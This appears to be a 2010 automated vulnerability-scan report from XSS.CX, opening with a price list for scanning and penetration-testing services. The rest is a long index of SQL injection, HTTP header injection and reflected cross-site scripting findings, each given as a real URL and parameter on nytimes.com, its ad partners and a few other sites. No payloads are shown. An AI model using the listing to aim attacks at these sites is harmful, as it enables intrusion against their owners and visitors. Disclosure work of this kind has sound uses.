Contractor for Hire: Per Minute, Per Day, Bounty Hunting

Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:

Report generated by XSS.CX at Fri Nov 12 22:21:15 CST 2010.

Cross Site Scripting Reports | Hoyt LLC Research

1. SQL injection

1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]

1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]

1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]

1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]

1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]

1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]

2. HTTP header injection

2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

2.2. http://50.xg4ken.com/media/redir.php [url[] parameter]

2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]

2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]

2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]

2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]

2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]

2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]

2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]

2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]

2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]

2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]

2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]

2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]

2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]

2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]

2.24. http://nytimes.com/rss [REST URL parameter 1]

2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]

2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]

2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]

2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]

2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]

2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]

2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]

2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]

2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]

2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]

2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]

2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]

2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]

2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]

2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]

2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]

2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]

2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]

2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]

2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]

2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]

2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]

2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]

2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]

2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]

2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]

2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]

2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]

2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]

2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]

2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]

2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]

2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]

2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]

2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]

2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]

2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]

2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]

2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]

2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]

2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]

2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]

2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]

2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]

2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]

2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]

2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]

2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]

2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]

2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]

2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]

2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]

2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]

2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]

2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]

2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]

2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]

2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]

3. Cross-site scripting (reflected)

3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]

3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]

3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]

3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]

3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]

3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]

3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]

3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]

3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]

3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]

3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]

3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]

3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]

3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]

3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]

3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]

3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]

3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]

3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]

3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]

3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]

3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]

3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]

3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]

3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]

3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]

3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]

3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]

3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]

3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]

3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]

3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]

3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]

3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]

3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]

3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]

3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]

3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]

3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]

3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]

3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]

3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]

3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]

3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]

3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]

3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]

3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]

3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]

3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]

3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]

3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]

3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]

3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]

3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]

3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]

3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]

3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]

3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]

3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]

3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]

3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]

3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]

3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]

3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]

3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]

3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]

3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]

3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]

3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]

3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]

3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]

3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]

3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]

3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]

3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]

3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]

3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]

3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]

3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]

3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]

3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]

3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]

3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]

3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]

3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]

3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]

3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]

3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]

3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]

3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]

3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]

3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]

3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]

3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]

3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]

3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]

3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]

3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]

3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]

3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]

3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]

3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]

3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]

3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]

3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]

3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]

3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]

3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]

3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]

3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]

3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]

3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]

3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]

3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]

3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]

3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]

3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]

3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]

3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]

3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]

3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]

3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]

3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]

3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]

3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]

3.126. http://digg.com/remote-submit [REST URL parameter 1]

3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]

3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]

3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]

3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]

3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]

3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]

3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2]

3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter]

3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]

3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]

3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]

3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]

3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]

3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]

3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]

3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]

3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]

3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]

3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]

3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]

3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]

3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]

3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]

3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]

3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]

3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]

3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]

3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]

3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]

3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]

3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]

3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]

3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]

3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]

3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]

3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]

3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]

3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]

3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]

3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]

3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]

3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]

3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]

3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]

3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]

3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter]

3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]

3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]

3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]

3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]

3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]

3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]

